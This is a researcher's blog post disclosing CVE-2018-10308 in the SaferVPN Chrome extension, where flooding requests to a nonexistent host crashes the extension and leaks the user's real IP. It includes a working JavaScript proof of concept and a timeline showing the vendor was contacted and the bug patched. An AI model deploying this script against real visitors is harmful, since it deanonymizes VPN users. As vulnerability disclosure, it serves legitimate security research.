SaferVPN CVE-2018-10308, from DoS to deanonymization

3:44 AM


TL,DR; After my last month's finding in Hotspot Shield, I decided to look at and audit more VPNs to see how many of the major VPN vendors are vulnerable to information leakage. Together with File Descriptor, we decided to look at 3 random major VPN clients to see what we can find. Our research was supported by the privacy advocate vpnmentor.

We initially selected PureVPN, Hotspot Shield, and Zenmate as pilot targets and went ahead with the research. what we've found surprised us: of all 3 vpn's we've tested, we've discovered all of them leak sensitive data.


The vulnerabilities would have allowed governments, hostile organizations, or individuals to identify the actual IP address or DNS of a user, and in some cases hijack the user's traffic. While Zenmate’s leak was somewhat minor compared to the two other VPNs, its still important. You can find the details of the vulnerabilities found here, here or here.


The fact that we found leaks in all the VPNs that we tested is worrying, and led us to believe VPNs may not be as safe as many may think. This opened doors for further research.
Our guess is that most VPNs have similar leaks and that users should take this into consideration when using VPNs.

Details

In this blog post, I will explore a vulnerability I found in SaferVPN Chrome Extension. the vulnerability, CVE-2018-10308 as simple as it is, should help malicious actors retrieve vital information such as IP addresses when a user visits a website.


When a series of simultaneous requests to a nonexistent server is sent, the VPN extension easily crashes, letting us leak real user IPs, DNS and other details which the VPN is suppose to hide.


This is a weird bug, as I didn't know chrome extensions could be dosed until now. I've tried putting breakpoints through the extension's debugger to see what is causing it and they seem to intentionally kill the extension when it resolves many non existent dns queries.


Here is a PoC that works on versions before 3.1.10

<script type="text/javascript">  
  var head = document.getElementsByTagName('head')[0];  
  var img = document.createElement('img');  
  img.src= "https://nonexistant.nonexistant.nonexistant";  
  function kill(){  
   for(var i=0;i<12;i++){  
    head.appendChild(img);  
    }
  }
  kill();  
  window.onload = setTimeout(function () {  
   var webService = "https://freegeoip.net/json/";  
     var script = document.createElement("script");  
     script.type = "text/javascript";  
     script.src = webService+"?callback=MyIP&format=jsonp";  
     document.getElementsByTagName("head")[0].appendChild(script);  
   }, 9000);   
  function MyIP(response) {  
    document.getElementById("ipaddress").innerHTML = response.ip;  
  }
</script>  
<div id = "ipaddress"></div>



Timeline

Thu, Mar 29 - contacted SaferVPN
Thu, Apr 19 - patch live.

You can write to me here if you'd like to talk about funding similar research.